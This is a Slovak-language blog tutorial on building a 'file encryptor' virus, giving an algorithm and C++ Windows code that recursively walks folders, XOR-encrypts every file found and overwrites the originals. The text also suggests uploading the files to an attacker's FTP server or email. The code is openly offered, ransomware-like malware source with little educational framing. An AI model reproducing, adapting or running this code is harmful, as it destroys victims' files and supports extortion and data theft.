Encryptovanie obsahu súborov pomocou file infectoru .

 


Vírus file encryptor je druh infectoru, ktorý mení obsah súborov, a to tým, že ho prepíše v encryptovanej forme.
Prepísané súbory uploadne na server (ftp,...) kde si ich útočník stiahne a obsah upraví pomocou decryptoru.

  Algoritmus:
     - Rekurzívne prechádzaj určenú zložku/y, alebo všetky jej podzložky.
     - Ak sa v zložke nájde súbor, otvor ho, a do bufferu načítaj všetke riadky.
     - Dátový buffer s obsahom nájdeného súboru algoritmom encryptuj a ulož do bufferu.
     - Encryptovaný obsah bufferu ulož do daného súboru.

Algoritmus môže byť doplnený o ďalšie kroky, ktorými sú napríklad uploadnutie na ftp server, odoslanie na email, a podobne.


Pripojené knižnice:

 

 #include "Convert.h" //https://www.netbot.sk/sk/14-blog-headers/84-convert-h
 #include "WinAPI.h" //https://www.netbot.sk/sk/14-blog-headers/31-winapi
 #include <iterator>
 #include <iostream>
 #include <fstream>
 #include <vector>
 #include <dirent.h> //http://softagalleria.net/dirent.php
 #include <string>
Funkcia rekurzívneho vyhľadávania súborov v priečinku:

 
 void ListFiles(const char * locatefolder)
 {
    if(this->directory=::opendir(locatefolder))
    {
      //Read content of directory, while the content exists.//
      while(entry = ::readdir(this->directory))
      {
        if(::strcmp(entry->d_name,".")!=0 && ::strcmp(entry->d_name,"..")!=0)
        {
          //String copy the path of the directory and names of found files.//
          ::strncpy(this->pathbuffer, locatefolder, sizeof(this->pathbuffer));
          ::strncat(this->pathbuffer, entry->d_name, sizeof(this->pathbuffer));

          //Compares, if names are of files or of folders.//
          if(::stat(this->pathbuffer,&this->status) == 0)
          {
            if(!this->IsDirectory((const char*)this->pathbuffer))
            {
              //Show only names of files.//
              ::std::cout << this->pathbuffer << "\n";

              //Handling names of files. Calls these 3 methods.//
              this->GetFileContent(this->pathbuffer);
              this->EncryptData();
              this->SaveContent();
            }
          }
        }
      }

      ::closedir(this->directory);
    }
  }
Funkcia na uloženie obsahu súboru do bufferu.

 
 ::std::string GetFileContent(const char *filename)
  {
    this->inputfilename = filename;
    this->inputfilename_ = filename;

    //Open the file.//
    ::std::ifstream read(filename, std::ios::in | std::ios::binary);
    if (read)
    {
      //Read content of the file.//
      read.seekg(0, ::std::ios::end);
      this->contents.resize(read.tellg());
      read.seekg(0, ::std::ios::beg);
      read.read(&this->contents[0], this->contents.size());
      read.close();
      return this->contents;
    }
  }
Funkcia na encryptovanie obsahu dátového bufferu:

 
 ::std::string EncryptData(void) 
  {
    //Specify key for encrypting.//
    char key = 'K';
    this->encryptcontents = this->contents;

    //Encrypting with XOR.//
    for (int i = 0; i < this->encryptcontents.size(); i++)
    {
      this->encryptcontents[i] = this->encryptcontents[i] ^ key;
    }
    return this->encryptcontents;
  }
Uloženie encryptovaného obsahu dátového bufferu späť do súboru:

 
void SaveContent(void)
  {
    //Convert from string to char*//
    this->encrypteddata = new char[this->encryptcontents.size() + 1];
    copy(this->encryptcontents.begin(),this->encryptcontents.end(),this->encrypteddata);
    this->encrypteddata[this->encryptcontents.size()] = '\0'; 

    //Write encrypted data to the file//
    this->handlefile = ::CreateFileA(this->inputfilename_, GENERIC_WRITE, 0, NULL, 
TRUNCATE_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); ::WriteFile(this->handlefile, this->encrypteddata, encryptcontents.size(), 0, NULL); }
 


Video encryptoru, ktorý som si navrhol, nájdete tu: